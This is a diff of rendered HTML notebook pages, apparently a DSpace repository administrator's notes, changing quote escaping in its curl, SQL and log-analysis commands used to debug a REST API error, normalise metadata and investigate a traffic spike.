req.add_header(&#39;User-agent&#39;, &#39;Alan Python bot&#39;)
res = urllib2.urlopen(req)
data = json.load(res)
item_id = data['id']
item_id = data[&#39;id&#39;]
return item_id
</code></pre><ul>
@ -1053,7 +1053,7 @@ TCP window size: 85.0 KByte (default)
</code></pre><ul>
<li>Apparently it happens once per request, which can be at least 1,500 times per day according to the DSpace logs on CGSpace (linode18):</li>
</ul>
<pre tabindex="0"><code>$ grep -c 'Falling back to request address' dspace.log.2019-04-20
<pre tabindex="0"><code>$ grep -c &#39;Falling back to request address&#39; dspace.log.2019-04-20
dspace.log.2019-04-20:1515
</code></pre><ul>
<li>I will fix it in <code>dspace/config/modules/oai.cfg</code></li>
@ -1098,7 +1098,7 @@ dspace.log.2019-04-20:1515
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ csvcut -c id,dc.identifier.uri,'dc.identifier.uri[]' ~/Downloads/2019-04-24-IITA.csv &gt; /tmp/iita.csv
<pre tabindex="0"><code>$ csvcut -c id,dc.identifier.uri,&#39;dc.identifier.uri[]&#39; ~/Downloads/2019-04-24-IITA.csv &gt; /tmp/iita.csv
</code></pre><ul>
<li>Carlos Tejo from the Land Portal had been emailing me this week to ask about the old REST API that Tsega was building in 2017
<ul>
@ -1108,7 +1108,7 @@ dspace.log.2019-04-20:1515
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ curl -f -H &quot;accept: application/json&quot; -H &quot;Content-Type: application/json&quot; -X POST &quot;https://dspacetest.cgiar.org/rest/items/find-by-metadata-field&quot; -d '{&quot;key&quot;:&quot;cg.subject.cpwf&quot;, &quot;value&quot;:&quot;WATER MANAGEMENT&quot;,&quot;language&quot;: &quot;en_US&quot;}'
<pre tabindex="0"><code>$ curl -f -H &#34;accept: application/json&#34; -H &#34;Content-Type: application/json&#34; -X POST &#34;https://dspacetest.cgiar.org/rest/items/find-by-metadata-field&#34; -d &#39;{&#34;key&#34;:&#34;cg.subject.cpwf&#34;, &#34;value&#34;:&#34;WATER MANAGEMENT&#34;,&#34;language&#34;: &#34;en_US&#34;}&#39;
curl: (22) The requested URL returned error: 401
</code></pre><ul>
<li>Note that curl only shows the HTTP 401 error if you use <code>-f</code> (fail), and only then if you <em>don&rsquo;t</em> include <code>-s</code>
@ -1118,19 +1118,19 @@ curl: (22) The requested URL returned error: 401
</ul>
</li>
</ul>
<pre tabindex="0"><code>dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=208 AND text_value='WATER MANAGEMENT' AND text_lang='en_US';
<pre tabindex="0"><code>dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=208 AND text_value=&#39;WATER MANAGEMENT&#39; AND text_lang=&#39;en_US&#39;;
count
-------
376
(1 row)
dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=208 AND text_value='WATER MANAGEMENT' AND text_lang='';
dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=208 AND text_value=&#39;WATER MANAGEMENT&#39; AND text_lang=&#39;&#39;;
count
-------
149
(1 row)
dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=208 AND text_value='WATER MANAGEMENT' AND text_lang IS NULL;
dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=208 AND text_value=&#39;WATER MANAGEMENT&#39; AND text_lang IS NULL;
count
-------
417
@ -1146,20 +1146,20 @@ dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AN
</code></pre><ul>
<li>Nevertheless, if I request using the <code>null</code> language I get 1020 results, plus 179 for a blank language attribute:</li>
</ul>
<pre tabindex="0"><code>$ curl -s -H &quot;Content-Type: application/json&quot; -X POST &quot;https://dspacetest.cgiar.org/rest/items/find-by-metadata-field&quot; -d '{&quot;key&quot;:&quot;cg.subject.cpwf&quot;, &quot;value&quot;:&quot;WATER MANAGEMENT&quot;,&quot;language&quot;: null}' | jq length
<pre tabindex="0"><code>$ curl -s -H &#34;Content-Type: application/json&#34; -X POST &#34;https://dspacetest.cgiar.org/rest/items/find-by-metadata-field&#34; -d &#39;{&#34;key&#34;:&#34;cg.subject.cpwf&#34;, &#34;value&#34;:&#34;WATER MANAGEMENT&#34;,&#34;language&#34;: null}&#39; | jq length
1020
$ curl -s -H &quot;Content-Type: application/json&quot; -X POST &quot;https://dspacetest.cgiar.org/rest/items/find-by-metadata-field&quot; -d '{&quot;key&quot;:&quot;cg.subject.cpwf&quot;, &quot;value&quot;:&quot;WATER MANAGEMENT&quot;,&quot;language&quot;: &quot;&quot;}' | jq length
$ curl -s -H &#34;Content-Type: application/json&#34; -X POST &#34;https://dspacetest.cgiar.org/rest/items/find-by-metadata-field&#34; -d &#39;{&#34;key&#34;:&#34;cg.subject.cpwf&#34;, &#34;value&#34;:&#34;WATER MANAGEMENT&#34;,&#34;language&#34;: &#34;&#34;}&#39; | jq length
179
</code></pre><ul>
<li>This is weird because I see 9421156 items with &ldquo;WATER MANAGEMENT&rdquo; (depending on wildcard matching for errors in subject spelling):</li>
</ul>
<pre tabindex="0"><code>dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=208 AND text_value='WATER MANAGEMENT';
<pre tabindex="0"><code>dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=208 AND text_value=&#39;WATER MANAGEMENT&#39;;
count
-------
942
(1 row)
dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=208 AND text_value LIKE '%WATER MANAGEMENT%';
dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=208 AND text_value LIKE &#39;%WATER MANAGEMENT%&#39;;
count
-------
1156
@ -1177,13 +1177,13 @@ dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AN
</li>
<li>I tested the REST API after logging in with my super admin account and I was able to get results for the problematic query:</li>
</ul>
<pre tabindex="0"><code>$ curl -f -H &quot;Content-Type: application/json&quot; -X POST &quot;https://dspacetest.cgiar.org/rest/login&quot; -d '{&quot;email&quot;:&quot;example@me.com&quot;,&quot;password&quot;:&quot;fuuuuu&quot;}'
$ curl -f -H &quot;Content-Type: application/json&quot; -H &quot;rest-dspace-token: b43d41a6-5ac1-455d-b49a-616b8debc25b&quot; -X GET &quot;https://dspacetest.cgiar.org/rest/status&quot;
$ curl -f -H &quot;rest-dspace-token: b43d41a6-5ac1-455d-b49a-616b8debc25b&quot; -H &quot;Content-Type: application/json&quot; -X POST &quot;https://dspacetest.cgiar.org/rest/items/find-by-metadata-field&quot; -d '{&quot;key&quot;:&quot;cg.subject.cpwf&quot;, &quot;value&quot;:&quot;WATER MANAGEMENT&quot;,&quot;language&quot;: &quot;en_US&quot;}'
<pre tabindex="0"><code>$ curl -f -H &#34;Content-Type: application/json&#34; -X POST &#34;https://dspacetest.cgiar.org/rest/login&#34; -d &#39;{&#34;email&#34;:&#34;example@me.com&#34;,&#34;password&#34;:&#34;fuuuuu&#34;}&#39;
$ curl -f -H &#34;Content-Type: application/json&#34; -H &#34;rest-dspace-token: b43d41a6-5ac1-455d-b49a-616b8debc25b&#34; -X GET &#34;https://dspacetest.cgiar.org/rest/status&#34;
$ curl -f -H &#34;rest-dspace-token: b43d41a6-5ac1-455d-b49a-616b8debc25b&#34; -H &#34;Content-Type: application/json&#34; -X POST &#34;https://dspacetest.cgiar.org/rest/items/find-by-metadata-field&#34; -d &#39;{&#34;key&#34;:&#34;cg.subject.cpwf&#34;, &#34;value&#34;:&#34;WATER MANAGEMENT&#34;,&#34;language&#34;: &#34;en_US&#34;}&#39;
</code></pre><ul>
<li>I created a normal user for Carlos to try as an unprivileged user:</li>
</ul>
<pre tabindex="0"><code>$ dspace user --add --givenname Carlos --surname Tejo --email blah@blah.com --password 'ddmmdd'
<pre tabindex="0"><code>$ dspace user --add --givenname Carlos --surname Tejo --email blah@blah.com --password &#39;ddmmdd&#39;
</code></pre><ul>
<li>But still I get the HTTP 401 and I have no idea which item is causing it</li>
<li>I enabled more verbose logging in <code>ItemsResource.java</code> and now I can at least see the item ID that causes the failure&hellip;
@ -1212,7 +1212,7 @@ $ curl -f -H &quot;rest-dspace-token: b43d41a6-5ac1-455d-b49a-616b8debc25b&quot;
<ul>
<li>Export a list of authors for Peter to look through:</li>
</ul>
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/2019-04-26-all-authors.csv with csv header;
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/2019-04-26-all-authors.csv with csv header;
COPY 65752
</code></pre><h2 id="2019-04-28">2019-04-28</h2>
<ul>
@ -1262,11 +1262,11 @@ COPY 65752
spa | 2
| 1074345
(11 rows)
dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN ('ethnob', 'en', '*', 'E.', '');
dspace=# UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN (&#39;ethnob&#39;, &#39;en&#39;, &#39;*&#39;, &#39;E.&#39;, &#39;&#39;);
UPDATE 360295
dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IS NULL;
dspace=# UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IS NULL;
UPDATE 1074345
dspace=# UPDATE metadatavalue SET text_lang='es_ES' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN ('es', 'spa');
dspace=# UPDATE metadatavalue SET text_lang=&#39;es_ES&#39; WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN (&#39;es&#39;, &#39;spa&#39;);
UPDATE 14
</code></pre><ul>
<li>Then I exported the whole repository as CSV, imported it into OpenRefine, removed a few unneeded columns, exported it, zipped it down to 36MB, and emailed a link to Carlos</li>

View File

@ -48,7 +48,7 @@ DELETE 1
But after this I tried to delete the item from the XMLUI and it is still present&hellip;
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -168,7 +168,7 @@ dspace=# DELETE FROM item WHERE item_id=74648;
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ curl -f -H &quot;Content-Type: application/json&quot; -X POST &quot;http://localhost:8080/rest/items/find-by-metadata-field&quot; -d '{&quot;key&quot;:&quot;cg.subject.cpwf&quot;, &quot;value&quot;:&quot;WATER MANAGEMENT&quot;,&quot;language&quot;: &quot;en_US&quot;}'
<pre tabindex="0"><code>$ curl -f -H &#34;Content-Type: application/json&#34; -X POST &#34;http://localhost:8080/rest/items/find-by-metadata-field&#34; -d &#39;{&#34;key&#34;:&#34;cg.subject.cpwf&#34;, &#34;value&#34;:&#34;WATER MANAGEMENT&#34;,&#34;language&#34;: &#34;en_US&#34;}&#39;
curl: (22) The requested URL returned error: 401 Unauthorized
</code></pre><ul>
<li>The DSpace log shows the item ID (because I modified the error text):</li>
@ -282,52 +282,52 @@ Please see the DSpace documentation for assistance.
<ul>
<li>The number of unique sessions today is <em>ridiculously</em> high compared to the last few days considering it&rsquo;s only 12:30PM right now:</li>
</ul>
<pre tabindex="0"><code>$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-05-06 | sort | uniq | wc -l
<pre tabindex="0"><code>$ grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; dspace.log.2019-05-06 | sort | uniq | wc -l
101108
$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-05-05 | sort | uniq | wc -l
$ grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; dspace.log.2019-05-05 | sort | uniq | wc -l
14618
$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-05-04 | sort | uniq | wc -l
$ grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; dspace.log.2019-05-04 | sort | uniq | wc -l
14946
$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-05-03 | sort | uniq | wc -l
$ grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; dspace.log.2019-05-03 | sort | uniq | wc -l
6410
$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-05-02 | sort | uniq | wc -l
$ grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; dspace.log.2019-05-02 | sort | uniq | wc -l
7758
$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-05-01 | sort | uniq | wc -l
$ grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; dspace.log.2019-05-01 | sort | uniq | wc -l
20528
</code></pre><ul>
<li>The number of unique IP addresses from 2 to 6 AM this morning is already several times higher than the average for that time of the morning this past week:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E '06/May/2019:(02|03|04|05|06)' | awk '{print $1}' | sort | uniq | wc -l
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#39;06/May/2019:(02|03|04|05|06)&#39; | awk &#39;{print $1}&#39; | sort | uniq | wc -l
7127
# zcat --force /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep -E '05/May/2019:(02|03|04|05|06)' | awk '{print $1}' | sort | uniq | wc -l
# zcat --force /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep -E &#39;05/May/2019:(02|03|04|05|06)&#39; | awk &#39;{print $1}&#39; | sort | uniq | wc -l
1231
# zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz | grep -E '04/May/2019:(02|03|04|05|06)' | awk '{print $1}' | sort | uniq | wc -l
# zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz | grep -E &#39;04/May/2019:(02|03|04|05|06)&#39; | awk &#39;{print $1}&#39; | sort | uniq | wc -l
1255
# zcat --force /var/log/nginx/access.log.3.gz /var/log/nginx/access.log.4.gz | grep -E '03/May/2019:(02|03|04|05|06)' | awk '{print $1}' | sort | uniq | wc -l
# zcat --force /var/log/nginx/access.log.3.gz /var/log/nginx/access.log.4.gz | grep -E &#39;03/May/2019:(02|03|04|05|06)&#39; | awk &#39;{print $1}&#39; | sort | uniq | wc -l
1736
# zcat --force /var/log/nginx/access.log.4.gz /var/log/nginx/access.log.5.gz | grep -E '02/May/2019:(02|03|04|05|06)' | awk '{print $1}' | sort | uniq | wc -l
# zcat --force /var/log/nginx/access.log.4.gz /var/log/nginx/access.log.5.gz | grep -E &#39;02/May/2019:(02|03|04|05|06)&#39; | awk &#39;{print $1}&#39; | sort | uniq | wc -l
1573
# zcat --force /var/log/nginx/access.log.5.gz /var/log/nginx/access.log.6.gz | grep -E '01/May/2019:(02|03|04|05|06)' | awk '{print $1}' | sort | uniq | wc -l
# zcat --force /var/log/nginx/access.log.5.gz /var/log/nginx/access.log.6.gz | grep -E &#39;01/May/2019:(02|03|04|05|06)&#39; | awk &#39;{print $1}&#39; | sort | uniq | wc -l
1410
</code></pre><ul>
<li>Just this morning between the hours of 2 and 6 the number of unique sessions was <em>very</em> high compared to previous mornings:</li>
</ul>
<pre tabindex="0"><code>$ cat dspace.log.2019-05-06 | grep -E '2019-05-06 (02|03|04|05|06):' | grep -o -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
<pre tabindex="0"><code>$ cat dspace.log.2019-05-06 | grep -E &#39;2019-05-06 (02|03|04|05|06):&#39; | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
83650
$ cat dspace.log.2019-05-05 | grep -E '2019-05-05 (02|03|04|05|06):' | grep -o -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
$ cat dspace.log.2019-05-05 | grep -E &#39;2019-05-05 (02|03|04|05|06):&#39; | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
2547
$ cat dspace.log.2019-05-04 | grep -E '2019-05-04 (02|03|04|05|06):' | grep -o -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
$ cat dspace.log.2019-05-04 | grep -E &#39;2019-05-04 (02|03|04|05|06):&#39; | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
2574
$ cat dspace.log.2019-05-03 | grep -E '2019-05-03 (02|03|04|05|06):' | grep -o -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
$ cat dspace.log.2019-05-03 | grep -E &#39;2019-05-03 (02|03|04|05|06):&#39; | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
2911
$ cat dspace.log.2019-05-02 | grep -E '2019-05-02 (02|03|04|05|06):' | grep -o -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
$ cat dspace.log.2019-05-02 | grep -E &#39;2019-05-02 (02|03|04|05|06):&#39; | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
2704
$ cat dspace.log.2019-05-01 | grep -E '2019-05-01 (02|03|04|05|06):' | grep -o -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
$ cat dspace.log.2019-05-01 | grep -E &#39;2019-05-01 (02|03|04|05|06):&#39; | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
3699
</code></pre><ul>
<li>Most of the requests were GETs:</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/{access,library-access}.log /var/log/nginx/{access,library-access}.log.1 | grep -E '06/May/2019:(02|03|04|05|06)' | grep -o -E &quot;(GET|HEAD|POST|PUT)&quot; | sort | uniq -c | sort -n
<pre tabindex="0"><code># cat /var/log/nginx/{access,library-access}.log /var/log/nginx/{access,library-access}.log.1 | grep -E &#39;06/May/2019:(02|03|04|05|06)&#39; | grep -o -E &#34;(GET|HEAD|POST|PUT)&#34; | sort | uniq -c | sort -n
1 PUT
98 POST
2845 HEAD
@ -336,19 +336,19 @@ $ cat dspace.log.2019-05-01 | grep -E '2019-05-01 (02|03|04|05|06):' | grep -o -
<li>I&rsquo;m not exactly sure what happened this morning, but it looks like some legitimate user traffic—perhaps someone launched a new publication and it got a bunch of hits?</li>
<li>Looking again, I see 84,000 requests to <code>/handle</code> this morning (not including logs for library.cgiar.org because those get HTTP 301 redirect to CGSpace and appear here in <code>access.log</code>):</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E '06/May/2019:(02|03|04|05|06)' | grep -c -o -E &quot; /handle/[0-9]+/[0-9]+&quot;
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#39;06/May/2019:(02|03|04|05|06)&#39; | grep -c -o -E &#34; /handle/[0-9]+/[0-9]+&#34;
84350
</code></pre><ul>
<li>But it would be difficult to find a pattern for those requests because they cover 78,000 <em>unique</em> Handles (ie direct browsing of items, collections, or communities) and only 2,492 discover/browse (total, not unique):</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E '06/May/2019:(02|03|04|05|06)' | grep -o -E &quot; /handle/[0-9]+/[0-9]+ HTTP&quot; | sort | uniq | wc -l
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#39;06/May/2019:(02|03|04|05|06)&#39; | grep -o -E &#34; /handle/[0-9]+/[0-9]+ HTTP&#34; | sort | uniq | wc -l
78104
# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E '06/May/2019:(02|03|04|05|06)' | grep -o -E &quot; /handle/[0-9]+/[0-9]+/(discover|browse)&quot; | wc -l
# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#39;06/May/2019:(02|03|04|05|06)&#39; | grep -o -E &#34; /handle/[0-9]+/[0-9]+/(discover|browse)&#34; | wc -l
2492
</code></pre><ul>
<li>In other news, I see some IP is making several requests per second to the exact same REST API endpoints, for example:</li>
</ul>
<pre tabindex="0"><code># grep /rest/handle/10568/3703?expand=all rest.log | awk '{print $1}' | sort | uniq -c
<pre tabindex="0"><code># grep /rest/handle/10568/3703?expand=all rest.log | awk &#39;{print $1}&#39; | sort | uniq -c
3 2a01:7e00::f03c:91ff:fe0a:d645
113 63.32.242.35
</code></pre><ul>
@ -363,28 +363,28 @@ $ cat dspace.log.2019-05-01 | grep -E '2019-05-01 (02|03|04|05|06):' | grep -o -
<ul>
<li>The total number of unique IPs on CGSpace yesterday was almost 14,000, which is several thousand higher than previous day totals:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep -E '06/May/2019' | awk '{print $1}' | sort | uniq | wc -l
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep -E &#39;06/May/2019&#39; | awk &#39;{print $1}&#39; | sort | uniq | wc -l
13969
# zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz | grep -E '05/May/2019' | awk '{print $1}' | sort | uniq | wc -l
# zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz | grep -E &#39;05/May/2019&#39; | awk &#39;{print $1}&#39; | sort | uniq | wc -l
5936
# zcat --force /var/log/nginx/access.log.3.gz /var/log/nginx/access.log.4.gz | grep -E '04/May/2019' | awk '{print $1}' | sort | uniq | wc -l
# zcat --force /var/log/nginx/access.log.3.gz /var/log/nginx/access.log.4.gz | grep -E &#39;04/May/2019&#39; | awk &#39;{print $1}&#39; | sort | uniq | wc -l
6229
# zcat --force /var/log/nginx/access.log.4.gz /var/log/nginx/access.log.5.gz | grep -E '03/May/2019' | awk '{print $1}' | sort | uniq | wc -l
# zcat --force /var/log/nginx/access.log.4.gz /var/log/nginx/access.log.5.gz | grep -E &#39;03/May/2019&#39; | awk &#39;{print $1}&#39; | sort | uniq | wc -l
8051
</code></pre><ul>
<li>Total number of sessions yesterday was <em>much</em> higher compared to days last week:</li>
</ul>
<pre tabindex="0"><code>$ cat dspace.log.2019-05-06 | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
<pre tabindex="0"><code>$ cat dspace.log.2019-05-06 | grep -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
144160
$ cat dspace.log.2019-05-05 | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
$ cat dspace.log.2019-05-05 | grep -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
57269
$ cat dspace.log.2019-05-04 | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
$ cat dspace.log.2019-05-04 | grep -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
58648
$ cat dspace.log.2019-05-03 | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
$ cat dspace.log.2019-05-03 | grep -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
27883
$ cat dspace.log.2019-05-02 | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
$ cat dspace.log.2019-05-02 | grep -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
26996
$ cat dspace.log.2019-05-01 | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
$ cat dspace.log.2019-05-01 | grep -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
61866
</code></pre><ul>
<li>The usage statistics seem to agree that yesterday was crazy:</li>
@ -423,9 +423,9 @@ Please see the DSpace documentation for assistance.
<li>Help Moayad with certbot-auto for Let&rsquo;s Encrypt scripts on the new AReS server (linode20)</li>
<li>Normalize all <code>text_lang</code> values for metadata on CGSpace and DSpace Test (as I had tested last month):</li>
</ul>
<pre tabindex="0"><code>UPDATE metadatavalue SET text_lang='en_US' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN ('ethnob', 'en', '*', 'E.', '');
UPDATE metadatavalue SET text_lang='en_US' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IS NULL;
UPDATE metadatavalue SET text_lang='es_ES' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN ('es', 'spa');
<pre tabindex="0"><code>UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN (&#39;ethnob&#39;, &#39;en&#39;, &#39;*&#39;, &#39;E.&#39;, &#39;&#39;);
UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IS NULL;
UPDATE metadatavalue SET text_lang=&#39;es_ES&#39; WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN (&#39;es&#39;, &#39;spa&#39;);
</code></pre><ul>
<li>Send Francesca Giampieri from Bioversity a CSV export of all their items issued in 2018
<ul>
@ -454,7 +454,7 @@ UPDATE metadatavalue SET text_lang='es_ES' WHERE resource_type_id=2 AND metadata
</li>
<li>All of the IPs from these networks are using generic user agents like this, but MANY more, and they change many times:</li>
</ul>
<pre tabindex="0"><code>&quot;Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2703.0 Safari/537.36&quot;
<pre tabindex="0"><code>&#34;Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2703.0 Safari/537.36&#34;
</code></pre><ul>
<li>I found a <a href="https://www.qurium.org/alerts/azerbaijan/azerbaijan-and-the-region40-ddos-service/">blog post from 2018 detailing an attack from a DDoS service</a> that matches our pattern exactly</li>
<li>They specifically mention:</li>
@ -473,7 +473,7 @@ UPDATE metadatavalue SET text_lang='es_ES' WHERE resource_type_id=2 AND metadata
<ul>
<li>I see that the Unpaywall bot is resonsible for a few thousand XMLUI sessions every day (IP addresses come from nginx access.log):</li>
</ul>
<pre tabindex="0"><code>$ cat dspace.log.2019-05-11 | grep -E 'ip_addr=(100.26.206.188|100.27.19.233|107.22.98.199|174.129.156.41|18.205.243.110|18.205.245.200|18.207.176.164|18.207.209.186|18.212.126.89|18.212.5.59|18.213.4.150|18.232.120.6|18.234.180.224|18.234.81.13|3.208.23.222|34.201.121.183|34.201.241.214|34.201.39.122|34.203.188.39|34.207.197.154|34.207.232.63|34.207.91.147|34.224.86.47|34.227.205.181|34.228.220.218|34.229.223.120|35.171.160.166|35.175.175.202|3.80.201.39|3.81.120.70|3.81.43.53|3.84.152.19|3.85.113.253|3.85.237.139|3.85.56.100|3.87.23.95|3.87.248.240|3.87.250.3|3.87.62.129|3.88.13.9|3.88.57.237|3.89.71.15|3.90.17.242|3.90.68.247|3.91.44.91|3.92.138.47|3.94.250.180|52.200.78.128|52.201.223.200|52.90.114.186|52.90.48.73|54.145.91.243|54.160.246.228|54.165.66.180|54.166.219.216|54.166.238.172|54.167.89.152|54.174.94.223|54.196.18.211|54.198.234.175|54.208.8.172|54.224.146.147|54.234.169.91|54.235.29.216|54.237.196.147|54.242.68.231|54.82.6.96|54.87.12.181|54.89.217.141|54.89.234.182|54.90.81.216|54.91.104.162)' | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
<pre tabindex="0"><code>$ cat dspace.log.2019-05-11 | grep -E &#39;ip_addr=(100.26.206.188|100.27.19.233|107.22.98.199|174.129.156.41|18.205.243.110|18.205.245.200|18.207.176.164|18.207.209.186|18.212.126.89|18.212.5.59|18.213.4.150|18.232.120.6|18.234.180.224|18.234.81.13|3.208.23.222|34.201.121.183|34.201.241.214|34.201.39.122|34.203.188.39|34.207.197.154|34.207.232.63|34.207.91.147|34.224.86.47|34.227.205.181|34.228.220.218|34.229.223.120|35.171.160.166|35.175.175.202|3.80.201.39|3.81.120.70|3.81.43.53|3.84.152.19|3.85.113.253|3.85.237.139|3.85.56.100|3.87.23.95|3.87.248.240|3.87.250.3|3.87.62.129|3.88.13.9|3.88.57.237|3.89.71.15|3.90.17.242|3.90.68.247|3.91.44.91|3.92.138.47|3.94.250.180|52.200.78.128|52.201.223.200|52.90.114.186|52.90.48.73|54.145.91.243|54.160.246.228|54.165.66.180|54.166.219.216|54.166.238.172|54.167.89.152|54.174.94.223|54.196.18.211|54.198.234.175|54.208.8.172|54.224.146.147|54.234.169.91|54.235.29.216|54.237.196.147|54.242.68.231|54.82.6.96|54.87.12.181|54.89.217.141|54.89.234.182|54.90.81.216|54.91.104.162)&#39; | grep -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
2206
</code></pre><ul>
<li>I added &ldquo;Unpaywall&rdquo; to the list of bots in the Tomcat Crawler Session Manager Valve</li>
@ -519,20 +519,20 @@ COPY 995
<li>Peter sent me a bunch of fixes for investors from yesterday</li>
<li>I did a quick check in Open Refine (trim and collapse whitespace, clean smart quotes, etc) and then applied them on CGSpace:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-05-16-fix-306-Investors.csv -db dspace-u dspace-p 'fuuu' -f dc.description.sponsorship -m 29 -t correct -d
